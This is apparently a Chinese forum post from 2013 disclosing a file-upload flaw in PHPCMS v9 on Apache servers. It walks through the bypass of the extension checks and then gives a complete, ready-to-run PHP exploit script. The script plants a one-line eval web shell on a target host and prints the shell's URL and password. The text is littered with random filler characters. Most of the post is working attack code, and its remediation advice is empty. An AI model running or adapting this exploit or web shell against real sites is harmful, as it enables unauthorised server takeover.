漏洞类型: 文件上传导致任意代码执行7 \( G7 c& L) j1 O) O
0 U5 K- J1 I+ @, N. u- x& W4 @
简要描述:
, G( v: Z4 z8 c6 {6 _% n. q/ V
8 q4 A. _* W4 c4 b0 |8 G+ I. x! rphpcms v9 getshell (apache)
- o* R& z( `+ o& S; i: o详细说明:4 Z7 ?# p0 H$ F- p" m5 k
+ ] i" Y+ ~2 I- N' i) P
漏洞文件:phpcms\modules\attachment\attachments.php
7 X/ E" _1 H8 M% x ^4 e0 P2 k, G0 a' t
public function crop_upload() { (isset($GLOBALS["HTTP_RAW_POST_DATA"])) { $pic = $GLOBALS["HTTP_RAW_POST_DATA"]; if (isset($_GET['width']) && !empty($_GET['width'])) { $width = intval($_GET['width']); } if (isset($_GET['height']) && !empty($_GET['height'])) { $height = intval($_GET['height']); } if (isset($_GET['file']) && !empty($_GET['file'])) { $_GET['file'] = str_replace(';','',$_GET['file']);//过滤了分号 if(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit();//is_image()检测是个关键 if (strpos($_GET['file'], pc_base::load_config('system', 'upload_url'))!==false) { $file = $_GET['file']; $basenamebasename = basename($file);//获取带有后缀的文件名 if (strpos($basename, 'thumb_')!==false) { $file_arr = explode('_', $basename); $basename = array_pop($file_arr); } $new_file = 'thumb_'.$width.'_'.$height.'_'.$basename; } else { pc_base::load_sys_class('attachment','',0); $module = trim($_GET['module']); $catid = intval($_GET['catid']); $siteid = $this->get_siteid(); $attachment = new attachment($module, $catid, $siteid); $uploadedfile['filename'] = basename($_GET['file']); $uploadedfile['fileext'] = fileext($_GET['file']); if (in_array($uploadedfile['fileext'], array('jpg', 'gif', 'jpeg', 'png', 'bmp'))) { $uploadedfile['isimage'] = 1; } $file_path = $this->upload_path.date('Y/md/'); pc_base::load_sys_func('dir'); dir_create($file_path); $new_file = date('Ymdhis').rand(100, 999).'.'.$uploadedfile['fileext']; $uploadedfile['filepath'] = date('Y/md/').$new_file; $aid = $attachment->add($uploadedfile); } $filepath = date('Y/md/'); file_put_contents($this->upload_path.$filepath.$new_file, $pic);//文件名可控、$pic可控 } else { return false; } echo pc_base::load_config('system', 'upload_url').$filepath.$new_file; exit; } }
- K/ c h2 t* @# ~/ Q6 B" I- e后缀检测:phpcms\modules\attachment\functions\global.func.php4 e% \7 Y, G9 ]# o& A( P) ]
; h+ X1 n2 V2 d$ a+ u5 c4 h$ k( Q' `
, f: W; {! _7 l, _0 W X: q' ^( N
9 \9 ~6 o9 r' S4 |function is_image($file) { $ext_arr = array('jpg','gif','png','bmp','jpeg','tiff'); $ext = fileext($file);关键地方 return in_array($ext,$ext_arr) ? $ext_arr :false; } + w/ i; V2 f* h; O$ U. X5 K
- M) p6 M% W" J
关键函数:
# I2 o: ]1 `! D3 l% X
$ N4 x* V8 l( J( a. K- I
; P- g% F$ N4 N: f: Q f" r! _3 C# j: b5 l0 W
function fileext($filename) { return strtolower(trim(substr(strrchr($filename, '.'), 1, 10))); }
' H' U3 {8 m7 G# _
2 J# f% o+ _* F8 E4 ] Fileext函数是对文件后缀名的提取。* y7 U! {8 i+ W/ T) C0 S$ t
根据此函数我们如果上传文件名为ddd.Php.jpg%20%20%20%20%20%20%20Php
$ D" d% Q8 X( x } p" J5 {- Q# p经过此函数提取到的后缀还是jpg,因此正在is_image()函数中后缀检测被绕过了。( A# S( G5 N/ Z
我们回到public function crop_upload() 函数中# e3 ?6 b' S6 W7 W) n- u
if(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit();" c$ w) U" B. T# _/ O$ _, C4 }( _. L
在经过了is_image的判断之后又来了个.php的判断,在此程序员使用的是strpos函数9 T9 y, ~! h' [) z
这个函数是对大小写敏感的函数我们使用.Php就可以直接绕过了。
1 L8 P5 J/ S; h4 K+ F, d经过上边的两层的过滤我们的ddd.Php.jpg%20%20%20%20%20%20%20Php后缀依然有效。
" q9 b+ Q9 K0 a; @最后$basename变量的值就为ddd.Php.jpg%20%20%20%20%20%20%20Php 然后使用file_put_contents函数写入到了指定目录。) ]1 a6 S( d6 k5 K# l
看见ddd.Php.jpg%20%20%20%20%20%20%20Php这个后缀,大家应该明白了,它用在apache搭建的服务器上可以被解析。7 @( I. j; }9 r5 _% _) k; `3 X
漏洞证明:3 m* _4 {1 Z! d* a: B
8 r% d6 m, Z' O ?5 f; r* h: Nexp:% k( M8 L/ P; F1 q5 I; ~, ?
- _, Y6 d. U2 k- _, @1 }" E<?php4 l; N1 s H+ @6 \
error_reporting(E_ERROR);
0 ~3 S( W4 ], Kset_time_limit(0);
% a. f# b# ?8 s+ @" b5 a$pass="ln";
0 B9 h9 ^7 k- |- u/ Nprint_r('
; L" Z# d7 g5 C2 ~; O+---------------------------------------------------------------------------+. L) X- p( G2 ]0 C
PHPCms V9 GETSHELL 0DAY : k- Z) l$ ^& w7 q# w' T
code by L.N.: R' F" K l5 n D7 F$ _5 n5 @
6 x3 y6 ~6 K% T- E7 l: a3 zapache 适用(利用的apache的解析漏洞) // 云安全 www.yunsec.net
. b: H1 t, V% s v2 u6 ?+---------------------------------------------------------------------------+. f8 Y! e0 h+ J( i) k, W7 b
');1 h" F4 Y, ~) l4 J
if ($argc < 2) {+ M+ E& |% R- O4 |' {& F! l: U
print_r('
1 d( @( ^; ^/ s$ h2 p+---------------------------------------------------------------------------+
N! {/ e* Z. G# L6 ^+ {5 Z* n8 CUsage: php '.$argv[0].' url path
6 D1 w( d" d( E! K8 x! ~$ A3 ~" V3 [2 b
Example:/ I$ H$ n7 Y9 ]+ N0 a$ J1 Q* b
1.php '.$argv[0].' lanu.sinaapp.com) `" }$ `& G4 D0 J6 L$ O
2.php '.$argv[0].' lanu.sinaapp.com /phpcms
; w! w5 a; q8 G, p" o( |1 t+---------------------------------------------------------------------------+
8 s, a8 _9 G& ^4 E. y; ~! D');: m4 |, L) A9 E; c, g4 B
exit;
1 E4 m9 P% z v6 a" s7 n9 O}
) ?! q% Y/ z+ f8 p% c: \7 z* ~ E9 R8 E3 o' d) T+ |0 d( X
$url = $argv[1];
( B6 F" I& B& I' Y$path = $argv[2];
# a) R( |: U& Y8 c! ^4 @$phpshell = '<?php @eval($_POST[\''.$pass.'\']);?>';
8 M. e! V# s' \6 A" \6 |8 o% u0 g$file = '1.thumb_.Php.JPG%20%20%20%20%20%20%20Php';
: P2 A# i/ d: F5 q# B4 dif($ret=Create_dir($url,$path))
7 u9 p+ `8 h: _; ~{: H' J6 }$ W8 x
//echo $ret;
" N4 D2 i0 [% f0 c: M) W! X' W$pattern = "|Server:[^,]+?|U";
3 ]; f/ H6 \! Dpreg_match_all($pattern, $ret, $matches);
/ F9 E5 W* q' Aif($matches[0][0]); a" f! D/ g4 L& w3 r$ c; J8 {% t
{
1 S8 |7 n2 F' l# a: ^if(strpos($matches[0][0],'Apache') == false): P3 `- \# t$ l: ]
{5 u+ ?' V" P6 y, U7 [9 _, f+ h/ ^
echo "\n亲!此网站不是apache的网站。\n";exit;
[+ B2 k5 ?4 a$ A8 D7 H @" r}8 o3 A: U+ c5 w k4 N
}
2 f8 J- y; U4 @! Y; G$ret = GetShell($url,$phpshell,$path,$file);
6 L: L5 p% z+ o$pattern = "|http:\/\/[^,]+?\.,?|U";
3 E. c7 t) q9 Y4 Z! _! K' hpreg_match_all($pattern, $ret, $matches);
& m6 x' ~. @- V; Mif($matches[0][0])
: |& b9 y: y4 b( k- x% n{4 I+ q. ^4 u' A4 ~& |! {
echo "\n".'密码为: '.$pass."\n";9 j4 y+ k' M5 n
echo "\r\nurl地址: ".$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;
9 a4 D6 {/ e; f T. M: U7 I @" a}0 ^9 Z# X2 m& k
else. F. `. S5 Z, u' {
{
I9 w$ s( ?. B; B5 X' m" c* m$pattern = "|\/uploadfile\/[^,]+?\.,?|U";! _* F7 Y% y' i1 W/ F, K+ r1 s- }
preg_match_all($pattern, $ret, $matches);0 v# t! x2 x) l* z3 Q* n% S
if($matches[0][0])
! n! e$ v* ]1 m, H4 i y3 ^{( ?0 s4 _, l0 k; K: \8 G
echo "\n".'密码为: '.$pass."\n";# w& y& A. h6 ?
echo "\r\nurl地址:".'http://'.$url.$path.$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;; _2 ^! X8 ]; E; m1 @0 h; q
}
0 H6 ]+ R: Q6 h# @: Xelse3 @3 u: ?1 @ {; v! E
{, o4 d8 u1 L6 u' ~9 `$ q! @
echo "\r\n没得到!\n";exit;" v+ L1 ]/ D, _ T R$ r
}- `, q9 m! Z1 i; D: q& T: u+ _
}1 u8 B& y4 X$ X, Q
}& E. A1 X4 O F; m% U6 J& h. m. o& d5 q
5 U4 x+ e" V& R6 e- z) H: Z4 hfunction GetShell($url,$shell,$path,$js)5 j, X9 ~2 R2 [, t/ t9 s
{
' m/ B8 M+ z" ? k( }) Y: O7 Y$content =$shell;
/ i3 v$ P& ^: Z% x3 d$data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://".$url.$path."/uploadfile/".$js." HTTP/1.1\r\n";1 Y7 i) e, A6 T+ k& L# O# I
$data .= "Host: ".$url."\r\n";
9 X: G) V6 k% y0 E) A) X$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
+ @2 o; v% O/ N- Y5 Y$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";5 s; u0 m: y. ?/ l$ t7 ^5 |
$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
, l* z) G% c7 Q4 s+ i$data .= "Connection: close\r\n";) w8 v7 z2 M# a; Z9 N: \% Y
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
8 H4 C. R9 z0 P! `$data .= $content."\r\n";
/ g9 q; r% k9 [# E% b6 V5 g& h# ^$ock=fsockopen($url,80);( y0 {* M; m& F2 }1 K
if (!$ock)
9 r+ E, s: n: l5 m{- @2 w! J/ p! O/ a8 s1 B% K
echo "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;2 f* [8 }4 m* M) S" O
}
7 o6 W0 f0 w1 felse
v! q" o8 F; V8 w{8 x6 m4 a- {! M" Y
fwrite($ock,$data);
5 y: o" X. E2 ^. T6 r; Q$resp = '';
/ X( p4 N8 S. H% S) ?' n; Mwhile (!feof($ock))2 D1 F$ T9 Z$ v
{
* |+ e# a, o* N, x) d7 X$ u$resp.=fread($ock, 1024);
0 z8 k" O. L( ]0 L0 p}$ m/ i# |3 \6 e, N
return $resp;" y4 W8 ~; p0 Q3 r& ^
}
0 q0 _6 S# {7 g: b}
3 u# c# \! j- h, A2 G: H2 Y
8 ]: J( _' z9 U; Y7 tfunction Create_dir($url,$path='')( K8 g0 t+ t2 `5 A
{1 U% `: _0 h6 T/ q
$content ='I love you';
) H% F$ g/ p. [( b3 O# e* H( M$data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://lanu.sinaapp.com/1.jpg HTTP/1.1\r\n";' _( t1 i/ L' y4 L0 a; ^# b' e/ V( g% ]
$data .= "Host: ".$url."\r\n";
8 U! R7 I" \/ v! u1 r1 v$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";7 x' e0 x; @# G, o, c3 v( x/ e( D
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
2 m% n! P# f" H" o) S* b3 n$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
. R+ t& b: ^/ g! m$data .= "Connection: close\r\n";- J4 \: T& N) ^+ ~. `( x% U/ w
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
& y1 U1 l* N- [$ g- V# _$data .= $content."\r\n";2 T! `6 v% u* R$ Y
$ock=fsockopen($url,80);
0 y1 R, K; {6 N9 i5 Oif (!$ock)
6 ], V3 ^5 ^. L# m{
/ H8 D; a& A$ M' X% O& @- d/ t Uecho "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;
3 p2 H% o! D" _6 _}/ I* e$ a( _. U$ r5 m
fwrite($ock,$data);+ k. a: d% U& w" d; o
$resp = '';
0 }6 a2 l4 d) [, dwhile (!feof($ock))
0 G. H9 s, x% b# ~; v* ~$ b{
a' l1 [: }. h7 u& s% w! W$resp.=fread($ock, 1024);
0 z/ Y e" o% ?! c! P}3 O& z6 j. s- N, }, S$ t$ W
return $resp;
! D q; j, L" H# @}9 |! M: J) P3 D/ g2 c, T: w
?> 8 V3 e6 C9 g9 Y' @3 Y( z
" [. k* p/ H; Y) ^. Y5 z
修复方案:( {. O7 L, j$ q8 ]8 b9 i
' B2 W& G, n6 w2 ^3 d. c
过滤过滤再过滤" `" y" |6 D2 W# E6 f5 _9 Z7 Z) d
& M# z" l" G" c- `3 F
|
发表于 2013-3-7 13:06:41
收藏
支持
反对